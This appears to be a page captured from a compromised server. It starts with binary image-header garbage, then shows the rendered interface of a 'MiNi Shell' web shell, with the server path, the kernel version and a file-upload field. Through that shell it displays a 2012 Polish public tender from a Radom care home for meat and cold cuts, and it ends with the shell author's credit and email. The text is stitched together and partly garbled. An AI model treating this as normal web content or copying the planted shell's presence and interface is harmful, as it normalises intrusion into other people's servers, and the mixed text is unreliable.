JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/238275-N-2012.html

<p class="kh_header"><b>Radom: zakup z dostawą mięsa i wędlin</b><br>
<b>Numer ogłoszenia: 238275 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej Nad Potokiem im. Bohdany "Danuty" Kijewskiej , ul. Andrzeja Struga 88, 26-600 Radom, woj. mazowieckie, tel. 48 3448689, faks 48 3448689.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dpsnp.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup z dostawą mięsa i wędlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - mięso wieprzowe i wołowe


Lp.	Asortyment	j.m.	Ilość
1.	Kark wieprzowy bez kości	kg	450
2.	Łopatka wp. bez kości	kg	       1300
3.	Nogi wieprzowe	kg	100
4.	Schab wp.bez kości	kg	200
5.	Wołowina -rozbratel	kg	60
6.	Wołowina b.k	kg	300
7.	Żeberka wieprzowe	kg	240
8.	Flaki wołowe	kg	180
9.	Kości schabowe	kg	800
10.	Serca wieprzowe	kg	40
11,	Płuca wieprzowe	kg	40
12.	Ogony wieprzowe	kg	420
13	Od szynki bez kości	kg	250
	                                   Ogółem :	kg	4.380kg


Część II - mięso drobiowe



Lp.	Asortyment	j.m.	Ilość
1.	Piersi z kurczaka	kg	300
2.	Porcje rosołowe 	kg	600
3.	Wątroba drobiowa	kg	170
4.	Żołądki drobiowe	kg	200
5.	Udka drobiowe	kg	1080
6.	Kurczaki	kg	450
7.	Gulasz drobiowy	kg	360
	                                 Ogółem :	kg	3.160 kg














Część III - wyroby wędliniarskie lepsze gatunkowo

Lp.	Asortyment 	J.m.	Ilość
1.	Polędwica sopocka	kg	 150
2.	Szynka gotowana	kg	150
3.	Szynka wiejska	kg	150
4.	Schab drobiowy	kg	150
5.	Pierś opiekana z indyka	kg	100
6.	Baleron	kg	200
7.	Boczek wędzony	kg	200
8.	Ogonówka	kg	250
9.	Szynka z piersi indyka	kg	150
10.	Łopatka pieczona	kg	220
11.	Szynka tradycyjna	kg	200
12.	Szynka tostowa	kg	220
	                                                Ogółem:	kg	2140 kg



Część IV - wyroby wędliniarskie - podroby

Lp.	Asortyment 	j.m.	Ilość
1.	Szynkówka z indyka	kg	150
2.	Szynka z piersi kurczaka	kg	170
3.	Baleron z indyka	kg	200
4.	Mielonka	kg	220
5.	Pieczeń bawarska	kg	220
6.	Pasztetowa	kg	300
7.	Kiszka gryczana	kg	400
8.	Salceson włoski	kg	200
9.	Pasztet mięsny	kg	300
10.	Salceson brunszwicki	kg	160
11.	Mielonka tyrolska	kg	200 
12.	Pasztet mazowiecki w słoiku - 400-500g.	
szt.	
       144
	
Ogółem:	
kg	2.520  kg bez             pasztetu mazowieckiego

                                                                         














Część V - wyroby wędliniarskie - kiełbasy


Lp.	Asortyment 	j.m.	Ilość
1.	Kiełbasa podsuszana	kg	450
2.	Kiełbasa dębicka	kg	450
3.	Kiełbasa krakowska	kg	450
4.	Kiełbasa debreczyńska	kg	300
5.	Kiełbasa żywiecka	kg	450
6.	Kiełbasa zwyczajna	kg	300
7.	Kiełbasa wiejska	kg	220
8.	Kiełbasa szynkowa	kg	200
9.	Kiełbasa parówkowa	kg	100
10.	Kiełbasa serwolatka	kg	200
11.	Parówki drobiowe	kg	400
12.	Mortadela	kg	480
13.	Kiełbasa biała	kg	100
	                              Ogółem	kg	4.100 kg


Wszystkie produkty winny być świeżę , odpowiednio oznakowane, zapakowane, z ważną datą przydatności do spożycia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Warunkiem udziału w postępowaniu są:
a)	przedłożenie w zakreślonym terminie właściwie sporządzonej oferty zgodnej z wymaganiami SIWZ,
b)	przedłożenie do oferty niżej wymienionych dokumentów, w formie oryginałów lub kserokopii, poświadczonych za zgodność z oryginałem przez osobę podpisującą ofertę: 
- oświadczenie o spełnieniu przez Wykonawcę warunków określonych                            w art. 22 ust. 1 p.z.p. /wg. wzoru stanowiącego zał. nr 1/,
- oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 pzp. /wg wzoru stanowiącego załącznik nr 2/
- oświadczenie o zapoznaniu się z SIWZ i braku zastrzeżeń do jej postanowień /wg. wzoru stanowiącego zał. Nr 3/
- aktualne, tj. wystawione nie wcześniej niż 6 miesięcy przed upływem       terminu składania ofert zaświadczenie o wpisie do ewidencji działalności gospodarczej, lub wypis z KRS,
- oświadczenie o warunkach dostawy-załącznik nr 7</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dpsnp.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Nad Potokiem im. Bohdany Danuty Kijewskiej 26-600 Radom, ul.Struga 88 budynek adm.pok.6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2012 godzina 10:00, miejsce: Dom Pomocy Społecznej Nad Potokiem im. Bohdany Danuty Kijewskiej 26-600 Radom, ul.Struga 88 budynek adm.pok.kadr.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso wieprzowe i wołowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	j.m.	Ilość
1.	Kark wieprzowy bez kości	kg	450
2.	Łopatka wp. bez kości	kg	       1300
3.	Nogi wieprzowe	kg	100
4.	Schab wp.bez kości	kg	200
5.	Wołowina -rozbratel	kg	60
6.	Wołowina b.k	kg	300
7.	Żeberka wieprzowe	kg	240
8.	Flaki wołowe	kg	180
9.	Kości schabowe	kg	800
10.	Serca wieprzowe	kg	40
11,	Płuca wieprzowe	kg	40
12.	Ogony wieprzowe	kg	420
13	Od szynki bez kości	kg	250
	                                   Ogółem :	kg	4.380kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	j.m.	Ilość
1.	Piersi z kurczaka	kg	300
2.	Porcje rosołowe 	kg	600
3.	Wątroba drobiowa	kg	170
4.	Żołądki drobiowe	kg	200
5.	Udka drobiowe	kg	1080
6.	Kurczaki	kg	450
7.	Gulasz drobiowy	kg	360
	                                 Ogółem :	kg	3.160 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyroby wędliniarskie lepsze gatunkowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment 	J.m.	Ilość
1.	Polędwica sopocka	kg	 150
2.	Szynka gotowana	kg	150
3.	Szynka wiejska	kg	150
4.	Schab drobiowy	kg	150
5.	Pierś opiekana z indyka	kg	100
6.	Baleron	kg	200
7.	Boczek wędzony	kg	200
8.	Ogonówka	kg	250
9.	Szynka z piersi indyka	kg	150
10.	Łopatka pieczona	kg	220
11.	Szynka tradycyjna	kg	200
12.	Szynka tostowa	kg	220
	                                                Ogółem:	kg	2140 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wyroby wędliniarskie-podroby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment 	j.m.	Ilość
1.	Szynkówka z indyka	kg	150
2.	Szynka z piersi kurczaka	kg	170
3.	Baleron z indyka	kg	200
4.	Mielonka	kg	220
5.	Pieczeń bawarska	kg	220
6.	Pasztetowa	kg	300
7.	Kiszka gryczana	kg	400
8.	Salceson włoski	kg	200
9.	Pasztet mięsny	kg	300
10.	Salceson brunszwicki	kg	160
11.	Mielonka tyrolska	kg	200 
12.	Pasztet mazowiecki w słoiku - 400-500g.	
szt.	
       144
	
Ogółem:	
kg	2.520  kg bez             pasztetu mazowieckiego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> wyroby wędliniarskie -kiełbasy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment 	j.m.	Ilość
1.	Kiełbasa podsuszana	kg	450
2.	Kiełbasa dębicka	kg	450
3.	Kiełbasa krakowska	kg	450
4.	Kiełbasa debreczyńska	kg	300
5.	Kiełbasa żywiecka	kg	450
6.	Kiełbasa zwyczajna	kg	300
7.	Kiełbasa wiejska	kg	220
8.	Kiełbasa szynkowa	kg	200
9.	Kiełbasa parówkowa	kg	100
10.	Kiełbasa serwolatka	kg	200
11.	Parówki drobiowe	kg	400
12.	Mortadela	kg	480
13.	Kiełbasa biała	kg	100
	                              Ogółem	kg	4.100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com